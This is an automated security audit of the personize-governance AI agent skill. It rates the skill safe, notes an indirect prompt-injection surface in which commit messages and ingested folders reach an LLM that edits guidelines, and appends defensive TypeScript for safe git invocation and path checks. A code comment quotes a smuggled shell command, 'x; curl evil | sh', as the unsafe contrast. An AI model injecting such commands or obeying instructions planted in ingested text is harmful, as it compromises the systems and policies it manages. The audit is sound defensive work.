personize-governance

Pass

Audited by Gen Agent Trust Hub on Apr 23, 2026

Risk Level: SAFE
Full Analysis
  • [INDIRECT_PROMPT_INJECTION]: The skill ingests external data, such as git commit messages and document folders, to propose guideline updates. Text from those sources is handed to the LLM, which creates an attack surface for indirect prompt injection.
  • Ingestion points: git commit logs are processed in auto-learning-loop.ts and directory contents in document-ingestion.ts.
  • Boundary markers: Guidelines are structured with standard Markdown headers (#, ##) and specialized tags such as <HARD_CONSTRAINT> that classify rules.
  • Capability inventory: The agent can create, update, and manage organizational guidelines through SDK methods such as client.guidelines.create and client.guidelines.update, used across multiple recipes.
  • Sanitization: The skill relies primarily on LLM-powered extraction followed by a mandatory "suggest" mode, so a human reviews every proposed change before it is applied to the governance base.
  • [COMMAND_EXECUTION]: auto-learning-loop.ts uses spawnSync to run git log for commit analysis. The command is invoked with an argument array rather than an interpolated shell string, which mitigates shell injection.
  • [DATA_EXPOSURE]: The skill handles sensitive organizational policies and requires a PERSONIZE_SECRET_KEY for API access. This is a legitimate requirement of the vendor's service, and the key is read from a standard environment variable.
  • [SAFE]: The generateClaudeMd function in ide-governance-bridge.ts validates output paths to prevent path traversal, so generated files stay within the current working directory.
  • [SAFE]: All external resources, including the required SDK and API endpoints, originate from the official domain and repositories of the skill's author, personizeai.
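As an added example, not code from the personize-governance skill or its author, the two mitigations credited in the COMMAND_EXECUTION and path-validation findings above written out in TypeScript: a git log invocation through spawnSync with an argv array and no shell, and a path-containment check of the kind generateClaudeMd is described as performing. The function names, the revision allow-list, the record format, the forged-record filter and the constructed sample output are this example's own assumptions. The guard against option injection and the --end-of-options flag (git 2.24 or newer) go beyond what the audit describes: an argv array stops a shell from parsing the value, but git still parses its own argv, so a value beginning with "-" would otherwise be read as a flag.

```typescript
// Added example (not code from the personize-governance skill). Names, the ref
// allow-list and the record format are assumptions made for this illustration.
import * as path from "node:path";
import { spawnSync } from "node:child_process";

// Conservative allow-list for a revision name that comes from outside: it must
// not start with "-" (git would parse it as an option) and may only contain
// characters ordinarily found in ref names. ".." is rejected separately so the
// caller, not the input, decides the range.
const SAFE_REF = /^[A-Za-z0-9][A-Za-z0-9._\/-]{0,127}$/;

export function buildGitLogArgs(sinceRef: string, maxCount = 50): string[] {
  if (!SAFE_REF.test(sinceRef) || sinceRef.includes("..")) {
    throw new Error(`refusing suspicious revision name: ${JSON.stringify(sinceRef)}`);
  }
  // %x00 separates fields and %x1e separates records; a subject line cannot
  // contain NUL, so a commit message cannot forge a complete record on its own.
  // --end-of-options (git >= 2.24) forces the trailing argument to be read as a
  // revision even if the allow-list above were ever loosened.
  return [
    "log",
    `--max-count=${maxCount}`,
    "--format=%H%x00%s%x00%b%x1e",
    "--end-of-options",
    `${sinceRef}..HEAD`,
  ];
}

export interface CommitRecord {
  hash: string;
  subject: string;
  body: string;
}

// Parses output in the format above. Records whose hash is not hex of commit
// length are dropped: that is what a body containing a stray 0x1e would produce.
// Commit text is untrusted input and is returned as data, never interpreted.
export function parseGitLog(stdout: string): CommitRecord[] {
  return stdout
    .split("\x1e")
    .map((rec) => rec.replace(/^\n/, "")) // git terminates each entry with "\n"
    .filter((rec) => rec.length > 0)
    .map((rec) => {
      const [hash, subject = "", body = ""] = rec.split("\x00");
      return { hash, subject, body: body.trim() };
    })
    .filter((rec) => /^[0-9a-f]{40,64}$/.test(rec.hash));
}

export function readCommitMessages(repoDir: string, sinceRef: string): CommitRecord[] {
  // Unsafe alternative, shown for contrast only:
  //   spawnSync(`git log ${sinceRef}..HEAD`, { shell: true })
  // would hand a ref such as "x; curl evil | sh" to the shell.
  const result = spawnSync("git", buildGitLogArgs(sinceRef), {
    cwd: repoDir,
    encoding: "utf8",
    shell: false, // argv goes straight to execve; no shell metacharacter parsing
    maxBuffer: 16 * 1024 * 1024,
  });
  if (result.error) throw result.error;
  if (result.status !== 0) throw new Error(`git log failed: ${result.stderr}`);
  return parseGitLog(result.stdout);
}

// Resolves relPath against cwd and refuses anything that does not land strictly
// inside it. The check is lexical: it normalizes "a/../b" and rejects "../x" or
// absolute paths, but does not follow symlinks inside the directory.
export function resolveWithinCwd(relPath: string, cwd: string = process.cwd()): string {
  const root = path.resolve(cwd);
  const target = path.resolve(root, relPath);
  const rel = path.relative(root, target);
  // "" means the directory itself, ".." or "../x" climbs out, an absolute
  // relative form means another drive (Windows). All are rejected.
  if (rel === "" || rel === ".." || rel.startsWith(`..${path.sep}`) || path.isAbsolute(rel)) {
    throw new Error(`refusing to write outside ${root}: ${JSON.stringify(relPath)}`);
  }
  return target;
}
```

readCommitMessages needs a real repository and git on PATH; buildGitLogArgs, parseGitLog and resolveWithinCwd are pure and can be checked offline. The containment check is lexical only, so if the working directory can contain attacker-created symlinks, resolve the existing parent with fs.realpathSync before comparing.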
Audit Metadata
Risk Level: SAFE
Analyzed: Apr 23, 2026, 04:20 PM